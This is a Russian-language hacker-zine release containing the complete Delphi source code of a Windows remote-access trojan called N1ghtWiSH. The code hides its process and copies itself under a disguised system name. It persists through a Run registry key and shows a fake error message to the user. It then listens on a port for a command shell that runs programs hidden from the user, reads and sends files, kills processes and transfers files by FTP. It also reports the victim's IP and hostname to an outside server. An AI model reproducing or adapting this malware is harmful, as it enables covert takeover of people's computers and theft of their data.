----------------------------------------------
#!/usr/share/doc/defaced/3/tandp/nightwish.txt
----------------------------------------------
[ N1ghtWiSH project ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ by defaced staff ]
B14cKh47z fUck1n s7uFf - WTF???
Вы спросите, что это за херня? это был закрытый релиз ZUDteam =)) Короче, вот
исходник трояна для windoz. Тут есть несколько интересных техник, которые могут
помочь при написании троя. Стоит сказать, что код _не_ оптимизирован, тут есть
много лишнего, но это не важно. Цель - показать идею.
---------------------------------// N1ghtWiSH.dpr
program N1ghtWiSH;
uses
Forms, Registry,
main in 'main.pas' {Form1};
procedure hidenow; external 'kernel32.dll' name 'RegisterServiceProcess';
{$R *.res}
var
VerReg: TRegistry;
winver: string;
begin
Application.Initialize;
Application.ShowMainForm:=false;
Application.CreateForm(TForm1, Form1);
VerReg:=TRegistry.Create;
VerReg.RootKey:=$80000002;
VerReg.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winver:=VerReg.ReadString('Version');
if winver = 'Windows 98' then
begin
try
asm // Я точно не знаю, в каких виндах кроме
push 1 // 98 работает register_service_process().
push 0 // Поэтому такой гимор...
call hidenow; //
end;
except
end;
end;
VerReg.CloseKey;
Application.Run;
end.
// _EOF_ N1ghtWiSH.dpr
---------------------------------// main.pas
unit main;
interface
// тут много лишнего vvvv
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Sockets, ExtCtrls, NMsmtp, ScktComp, StdCtrls,
ComCtrls, FileCtrl, NMFtp, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, Psock, Registry,ShellAPI, IdRawBase, IdRawClient,
IdIcmpClient;
type
TForm1 = class(TForm)
Watcher: TTimer;
SNIF: TTcpServer;
FList: TFileListBox;
FTP: TNMFTP;
CLIENT: TTcpClient;
conffile: TListBox;
CheckBox1: TCheckBox;
procedure FormCreate(Sender: TObject);
procedure SNIFAccept(Sender: TObject; ClientSocket: TCustomIpClient);
procedure WatcherTimer(Sender: TObject);
private
//
public
procedure KillProc(ClassName: PChar; WindowTitle: PChar);
end;
var
Form1: TForm1;
statstr,oldip,newip,winddir, autoruner, codename: string;
ReG: TRegistry;
onlineTime: integer;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
begin
onlineTime:=0;
ReG:=TRegistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winddir:=ReG.ReadString('SystemRoot');
if (FileExists(winddir+'\winass.dll')=true) and (FileExists(winddir+'\mstask666.exe')=true) then ConfFile.Items.LoadFromFile(winddir+'\winass.dll') else begin
CopyFile(Pchar(Application.ExeName),Pchar(winddir+'\mstask666.exe'),FALSE);
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
Reg.WriteString('mstask666',winddir+'\mstask666.exe');
Chdir(winddir);
Random(500);
Random(500);
ConfFile.Items.Strings[0]:='ftp.somethere.ru';
ConfFile.Items.Strings[1]:='LAMER';
ConfFile.Items.Strings[2]:='LAMER';
Randomize;
ConfFile.Items.Strings[3]:=SNIF.LocalHostName+IntToStr(Random(500));
ConfFile.Items.SaveToFile('winass.dll');
fileSetAttr(winddir+'\mstask666.exe',faSysfile);
fileSetAttr(winddir+'\winass.dll',faSysfile);
Reg.CloseKey;
MessageBox(handle,'Sorry, but some wrong! Please, remove this file!','Error',MB_ICONWARNING);
Application.Terminate;
end;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if ReG.ValueExists('mstask666')= false then Reg.WriteString('mstask666',winddir+'\mstask666.exe');
reg.CloseKey;
statstr:='null';
SNIF.LocalPort:='31339'; // PORT TO LISTEN
SNIF.Active:=true;
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
codename:=confFile.Items.Strings[3];
Watcher.Enabled:=true;
end;
procedure TForm1.SNIFAccept(Sender: TObject;
ClientSocket: TCustomIpClient);
var
cmd,welc,comm, frem,floc,banner,onliner : string;
blank,ind1,ind2,ind3: integer;
finder : TSearchRec;
Wnd : hWnd;
SysDate: TDateTime;
S: TStringList;
buff: ARRAY [0..127] OF Char;
begin
banner:=SNIF.LocalHostName;
if SNIF.LocalHostName = '' then banner:= SNIF.LocalHostAddr;
ClientSocket.Sendln(' Welcome to N1ghtWiSH ('+banner+'), Master !');
welc := SNIF.LocalHostName+'> ';
while true do
begin
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln(welc,'');
cmd:=ClientSocket.Receiveln(#13#10);
if cmd <> '' then
begin
if cmd = '?' then begin
ClientSocket.Sendln('ZUDteam N1ghtWiSH (Night Windows SHell =)',#13#10);
ClientSocket.Sendln('Nice to see you, Master!',#13#10);
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln('Commands:',#13#10);
ClientSocket.Sendln('system-info - View some info about system',#13#10); // ok
ClientSocket.Sendln('ftpput - Upload file to ftp-serv',#13#10); // ok
ClientSocket.Sendln('ftpget - Download file from ftp-serv',#13#10); // ok
ClientSocket.Sendln('dir - view dir list',#13#10); // ok
ClientSocket.Sendln('find - searching files',#13#10); // ok
ClientSocket.Sendln('findnext - resume searching files',#13#10);
ClientSocket.Sendln('view - file viewer',#13#10); // ok
ClientSocket.Sendln('exec - run any prog (you''l NOT see it!!!)',#13#10); // ok
ClientSocket.Sendln('windows-list - show list of all visible windows',#13#10);
ClientSocket.Sendln('process-list - show processes on machine ',#13#10); //ok
ClientSocket.Sendln('process-kill - kill process on machine ',#13#10);
ClientSocket.Sendln('windir - display windows directory',#13#10); //ok
ClientSocket.Sendln('viewconf - view current config',#13#10); // ok
ClientSocket.Sendln('editconf - set new config',#13#10); // ok
ClientSocket.Sendln('DIE-nahui - uninstall trojan',#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'exec' then
begin
ClientSocket.Sendln('YOU''L NOT SEE, WhAT GOING ON & USER CAN DETECT YOU!!! ',#13#10);
ClientSocket.Sendln('Are you sure (crazy;) ? [y/n] :','');
comm:=ClientSocket.Receiveln(#13#10);
if comm = 'y' then begin
ClientSocket.Sendln('Ok, enter command: ','');
comm:=ClientSocket.Receiveln(#13#10);
WinExec(Pchar(comm),SW_HIDE);
end
else ClientSocket.Sendln('exec aborted (yeah...)',#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'windir' then begin
ClientSocket.Sendln('Windows dir: '+winddir,#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'system-info' then begin
ClientSocket.Sendln('---==[ SOME SYSTEM INFO ]==---',#13#10);
Sysdate:=Time;
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln('Date: '+DateToStr(SysDate),#13#10);
ClientSocket.Sendln('Time: '+TimeToStr(SysDate),#13#10);
if onlineTime < 60 then onliner:='00:00:'+IntToStr(OnlineTime)
else if onlineTime< 3600 then begin
onliner:='00:'+IntToStr(OnlineTime div 60)+':'+IntTOStr(OnlineTime mod 60);
end
else begin
onliner:=IntTOStr(OnLineTime div 3600)+':'+IntTOStr((OnLineTime mod 3600) div 60)+':'+IntToStr((OnLineTime mod 3600) mod 60);
end;
ClientSocket.Sendln('Time ONLINE: '+onliner,#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'dir' then begin
ClientSocket.Sendln('Enter path: ','');
comm:=ClientSocket.Receiveln(#13#10);
if DirectoryExists(comm)= false then ClientSocket.Sendln('dir ('+comm+') not exist',#13#10)
else begin
Flist.Directory:=comm;
if flist.Items.Count >0 then
begin
ind2:=0;
ClientSocket.Sendln('------------------------------[ Files here: '+IntTOStr(flist.Items.Count)+']--',#13#10);
while ind2 <= (flist.Items.Count-1) do
begin
if StrLen(Pchar(flist.Items.Strings[ind2])) < 30 then begin
ClientSocket.Sendln(flist.items.Strings[ind2],'');
for blank:=0 to (30-StrLen(Pchar(flist.Items.Strings[ind2]))) do
begin
ClientSocket.Sendln(' ','');
end;
end
else begin
ClientSocket.Sendln(flist.items.Strings[ind2],#13#10);
end;
if (ind2+1)<=(flist.Items.Count-1) then ClientSocket.Sendln(flist.items.Strings[ind2+1]+' ',#13#10)
else ClientSocket.Sendln('',#13#10);
ind2 := ind2+2;
end;
end;
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'process-list' then begin
Wnd := GetWindow(Handle, gw_HWndFirst);
ClientSocket.Sendln('-------------------------------------[ Process list: ]--',#13#10);
while Wnd <> 0 do
begin
IF //(Wnd <> Application.Handle) AND {-Собственное окно}
(IsWindowVisible(Wnd)or checkbox1.checked) AND {-Невидимые окна}
((GetWindow(Wnd, gw_Owner) = 0)or checkbox1.checked) AND {-Дочернии окна}
(GetWindowText(Wnd, buff, sizeof(buff)) <> 0) {-Окна без заголовков}
then begin
GetWindowText(Wnd, buff, sizeof(buff));
ClientSocket.Sendln(buff,#13#10);
end;
Wnd := GetWindow(Wnd, gw_hWndNext);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'windows-list' then begin
Wnd := GetWindow(Handle, gw_HWndFirst);
while Wnd <> 0 do
begin
if IsWindowVisible(Wnd) and
(GetWindow(Wnd, gw_Owner) = 0) and
(GetWindowText(Wnd, buff, sizeof(buff)) <> 0)
then begin
GetWindowText(Wnd, buff, sizeof(buff));
ClientSocket.Sendln((StrPas(buff)),#13#10);
end;
Wnd := GetWindow(Wnd, gw_hWndNext);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'process-kill' then begin
ClientSocket.Sendln('Window caption: ','');
comm:=ClientSocket.Receiveln(#13#10);
if comm <> '' then Form1.KillProc(nil,pchar(comm));
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'find' then begin
ClientSocket.Sendln('Searchmask (i.e. "c:\Windoz\*.txt"): ','');
comm:=ClientSocket.Receiveln(#13#10);
FindFirst(comm,$0000003F,finder);
ClientSocket.Sendln(finder.Name,#13#10);
finder.Name:='None';
end
else if cmd = 'findnext' then begin
FindNext(finder);
ClientSocket.Sendln(finder.Name,#13#10);
finder.Name:='None';
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'view' then begin
ClientSocket.Sendln('File localion (i.e. c:\win\Suprpass.txt): ','');
comm:=ClientSocket.Receiveln(#13#10);
if FileExists(comm) = false then ClientSocket.Sendln(' file not exists',#13#10) else
begin
try
S:= TStringList.Create;
S.LoadFromFile(comm);
ClientSocket.Sendln('-----------------------------------------------[ Strings: '+IntToStr(S.Count)+']--',#13#10);
for ind1:= 0 to s.Count-1 do ClientSocket.Sendln(s.Strings[ind1],#13#10);
except
ClientSocket.Sendln('[!] Cant view!',#13#10);
end;
end;
S.Destroy;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'ftpput' then begin
ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
try
FTP.Connect;
ind3:=1;
ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
ClientSocket.Sendln('Local File: ','');
floc := ClientSocket.Receiveln(#13#10);
ClientSocket.Sendln('Remote File: ','');
frem := ClientSocket.Receiveln(#13#10);
if (FileExists(floc) = false) then
begin
ClientSocket.Sendln('Local File not ExIST!',#13#10);
ind3:=0;
end;
if (ind3 = 1) then FTP.Upload(floc,frem);
FTP.Disconnect;
except
ClientSocket.Sendln('[!] Error !',#13#10);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'ftpget' then begin
ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
try
FTP.Connect;
ind3:=1;
ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
ClientSocket.Sendln('Remote File: ','');
frem := ClientSocket.Receiveln(#13#10);
ClientSocket.Sendln('Local File: ','');
floc := ClientSocket.Receiveln(#13#10);
if (FileExists(floc) = true) then
begin
ClientSocket.Sendln('tHis file already exists!',#13#10);
ind3:=0;
end;
if (ind3 = 1) then FTP.Download(frem,floc);
FTP.Disconnect;
except
ClientSocket.Sendln('[!] Error! ',#13#10);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'viewconf' then begin
ClientSocket.Sendln(' - Current N1ghtWiSH conf -',#13#10);
ClientSocket.Sendln('System codename: '+codename,#13#10);
ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'DIE-nahui' then begin
ClientSocket.Sendln(' -=DIE Haxyu`=- SELF-DESTROING MODE',#13#10);
ClientSocket.Sendln('ARE YOU SURE? Type "B-nu39y-BCE" for start uninstall : ','');
comm := ClientSocket.Receiveln(#13#10);
if comm <> 'B-nu39y-BCE' then ClientSocket.Sendln(' - DESTROING CANCELED!',#13#10) else begin
Reg:=TREgistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if Reg.ValueExists('mstask666') = true then Reg.DeleteValue('mstask666') else ClientSocket.Sendln('Cannot uNinStall ! prog is not in registry',#13#10);
Reg.CloseKey;
ClientSocket.Sendln(' - SELF-DESTROING IS ENABLED !!!',#13#10);
ClientSocket.Sendln(' GOOD BYE, MASTER ! ;((( ',#13#10);
Sleep(1000);
try
ShellExecute(handle,'open','rundll32','user,disableoemlayer',nil,SW_SHOWNORMAL);
except
end;
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
else if cmd = 'editconf' then begin
ClientSocket.Sendln(' - Seting new N1ghtWiSH conf -',#13#10);
ClientSocket.Sendln('Ftp-server: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[0]:=comm;
ClientSocket.Sendln('Login: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[1]:= comm;
ClientSocket.Sendln('Password: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[2]:=comm;
ClientSocket.Sendln(' OK, Look at new setings: ',#13#10);
ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
ClientSocket.Sendln('LOAD NEW SETTINGS? [y/n]: ','');
comm := ClientSocket.Receiveln(#13#10);
chDir(winddir);
if comm = 'y' then begin
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
ConfFile.Items.SaveToFile('winass.dll');
end
else ConfFile.Items.LoadFromFile('winass.dll');
end
////////////////////////////////////////////////////////////////////////////////////////////////
else ClientSocket.Sendln('! Unknown command (try "?" to get some info)',#13#10);
end;
end;
end; // IFAccept END
procedure TForm1.WatcherTimer(Sender: TObject);
var
myip,hostnam,date,sendstr1: String;
curDate: TDateTime;
len: integer;
begin
if SNIF.LocalHostAddr <> '127.0.0.1' then begin
if statstr = 'null' then begin
statstr:='31337';
myip :=SNIF.LocalHostAddr;
curDate:=Time;
date := DateToStr(curDate)+' '+TimeToStr(curDate) ;
hostNam:=SNIF.LookupHostName(myip);
sendstr1 := 'action=add&addr='+myip+'&host='+hostnam+'&codename='+codename+'&time='+date+'&os=win';
len := StrLen(Pchar(sendstr1));
CLIENT.Active:=true;
CLIENT.RemoteHost:='133.133.133.133';
CLIENT.RemotePort:='80';
try
if (CLIENT.Connect) = true then
begin
CLIENT.Sendln('POST /cgi-bin/nightwish.cgi HTTP/1.1',#13#10);
CLIENT.Sendln('Host: statistics.hosting.net',#13#10);
CLIENT.Sendln('Content-Type: application/x-www-url-formencoded',#13#10);
CLIENT.Sendln('Content-Length: '+IntToStr(len),#13#10);
CLIENT.Sendln('',#13#10);
CLIENT.Sendln(sendstr1,#13#10);
CLIENT.Disconnect;
end;
except
end;
end else onlineTime:=onlinetime+10;;
end else
begin
statstr := 'null';
end;
end;
procedure TForm1.KillProc(ClassName: PChar; WindowTitle: PChar);
const
PROCESS_TERMINATE = $0001;
var
ProcessHandle : THandle;
ProcessID: Integer;
TheWindow : HWND;
begin
TheWindow := FindWindow(Classname, WindowTitle);
GetWindowThreadProcessID(TheWindow, @ProcessID);
ProcessHandle := OpenProcess(PROCESS_TERMINATE, FALSE, ProcessId);
TerminateProcess(ProcessHandle,4);
end;
end.
// _EOF_ main.pas